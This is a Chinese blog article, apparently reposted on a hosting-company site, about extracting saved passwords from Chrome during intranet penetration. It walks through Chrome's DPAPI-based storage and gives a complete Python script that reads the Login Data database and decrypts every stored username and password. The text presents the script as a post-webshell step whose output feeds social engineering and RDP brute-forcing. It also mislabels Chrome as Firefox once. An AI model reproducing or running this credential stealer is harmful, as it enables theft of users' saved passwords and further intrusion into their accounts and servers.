密码破解之Chrome浏览器存储密码获取

在我们实战渗透内网过程中,经常会因为各种各样的密码破解问题而发愁。相对于外网来说,内网安全是较为脆弱的,因为大量的密码被重复使用,而如何获得这些非常有价值的密码,很可能就是一次渗透能否成功的关键。

[[163716]]

我们来详细分析一下,如何针对火狐浏览器自动保存的密码进行获取,并完成相应的程序编写。

一、关于Chrome浏览器密码存储机制:

谷歌浏览器加密后的密钥存储于%APPDATA%\..\Local\Google\Chrome\User Data\Default\Login Data”(这里的APPDATA是由系统or用户环境变量决定的)下的一个SQLite数据库中。那么他是如何加密的呢,通过开源的Chromium,我们来一探究竟:

首先,我们作为用户登录一个网站时,会在表单提交Username以及Password相应的值,Chrome会首先判断此次登录是否是一次成功的登录,部分判断代码如下:

  1. Provisional_save_manager_->SubmitPassed();  
  2.     if (provisional_save_manager_->HasGeneratedPassword())  
  3.         UMA_HISTOGRAM_COUNTS(“PasswordGeneration.Submitted”, 1);  
  4.     If (provisional_save_manager_->IsNewLogin() && !provisional_save_manager_->HasGeneratedPassword()){  
  5.         Delegate_->AddSavePasswordInfoBarIfPermitted(  
  6.         Provisional_save_manager_.release());  
  7. else {  
  8. provisional_save_manager_->Save();  
  9. Provisional_save_manager_.reset();  
  10. }  

当我们登录成功时,并且使用的是一套新的证书(也就是说是***次登录该网站),Chrome就会询问我们是否需要记住密码。

那么登录成功后,密码是如何被Chrome存储的呢?

答案在EncryptedString函数,通过调用EncryptString16函数,代码如下:

  1. Bool Encrypt::EncryptString(const std::string& plaintext,std::string* ciphertext) {  
  2.     DATA_BLOB input;  
  3.     Input.pbData = static_cast<DWORD>(plaintext.length());  
  4.       
  5.     DATA_BLOB output;  
  6.     BOOL result = CryptProtectData(&input, L””,NULLNULLNULL, 0,&output);  
  7.     If (!result)  
  8.         Return false;  
  9. //复制操作  
  10. Ciphertext->assign(reinterpret_cast<std::string::value_type*>(output.pbData);  
  11.  
  12. LocalFree(output.pbData);  
  13. Return true;  
  14. }  

代码***利用了Widows API函数CryptProtectData(请记住这个函数,因为后面会提到它)来加密。当我们拥有证书时,密码就会被回复给我们使用。

在我们得到服务器权限后,证书的问题已经不用考虑了,所以下一步,我们解决如何获得这些密码。

二、编写脚本跑出Chrome浏览器保存的密码

因为考虑到在大多数情况下,并不能远程登录到服务器上执行GUI的程序,所以做个Python脚本跑一下是***选择,唯一的缺点是如果WINDOWS不支持PYTHON环境,Python打包成EXE文件的话会比较大。

下面考虑代码部分,因为用户不同所在用户的文件夹就不同,需要知道LOGIN DATA文件的具体路径,所以我们需要python中的os.environ从环境变量中读取LOCALAPPDATA的路径,剩下的路径是谷歌默认生成。

获取LOGINDATA文件的写法为:

  1. google_path = r’ Google\Chrome\User Data\Default\Login Data’  
  2. file_path = os.path.join(os.environ[‘LOCALAPPDATA’],google_path)  
  3.  
  4. #Login Data文件可以利用python中的sqlite3库来操作。  
  5. conn = sqlite3.connect(file_path)  
  6. for row in conn.execute('select username_value, password_value, signon_realm from logins'):  
  7. #利用Win32crpt.CryptUnprotectData来对通过加密的密码进行解密操作。  
  8.     cursor = conn.cursor()  
  9. cursor.execute('select username_value, password_value, signon_realm from logins')  
  10.  
  11. #接收全部返回结果  
  12. for data in cursor.fetchall():  
  13. passwd = win32crypt.CryptUnprotectData(data[1],None,None,None,0)  
  14. #利用win32crypt.CryptUnprotectData解密后,通过输出passwd这个元组中内容,可以逐一得到Chrome浏览器存储的密码。  

这里我们用到了CryptUnprotectData这个函数,与之对应的是我们上文提到的CryptProtectData,理论上来说CryptProtectData加密的文本内容,都可以通过CryptUnprotectData函数来解密。对其他服务的解密方式,大家可以自行尝试。

三、完成实验脚本

脚本完整代码如下:

  1. #coding:utf8  
  2. import os, sys  
  3. import sqlite3  
  4. import win32crypt  
  5.  
  6.  
  7. google_path = r'Google\Chrome\User Data\Default\Login Data' 
  8.  
  9.  
  10. db_file_path = os.path.join(os.environ['LOCALAPPDATA'],google_path)  
  11. conn = sqlite3.connect(db_file_path)  
  12. cursor = conn.cursor()  
  13. cursor.execute('select username_value, password_value, signon_realm from logins')  
  14.  
  15. #接收全部返回结果  
  16. for data in cursor.fetchall():  
  17.     passwd = win32crypt.CryptUnprotectData(data[1],None,None,None,0)  
  18.       
  19.     if passwd:  
  20.         print '-------------------------' 
  21.         print u'[+]用户名: ' + data[0]   
  22.         print u'[+]密码: ' + passwd[1]   
  23.         print u'[+]网站URL: ' + data[2]  

效果如下:

 

当然,在取得服务器webshell的情况下,如果有执行权限但无法提权,可以利用这种方法挖掘密码,进而再利用社工思路对服务器RDP服务密码进行暴力破解。

如果Webshell不能回显,可以用类似getpass一样的方式,导出到文本中。

Python chrome.py > 1.txt

(提示:导出过程中,输出中文可能会报错,建议换成英文导出。)

注意:在用户打开Chrome时,Login Data文件是被上锁的,如果这时想要对其进行读取操作,可以将Login Data文件复制到临时目录进行读取操作。

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/122964.html<

(0)
运维的头像运维
上一篇2025-02-22 14:20
下一篇 2025-02-22 14:21

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注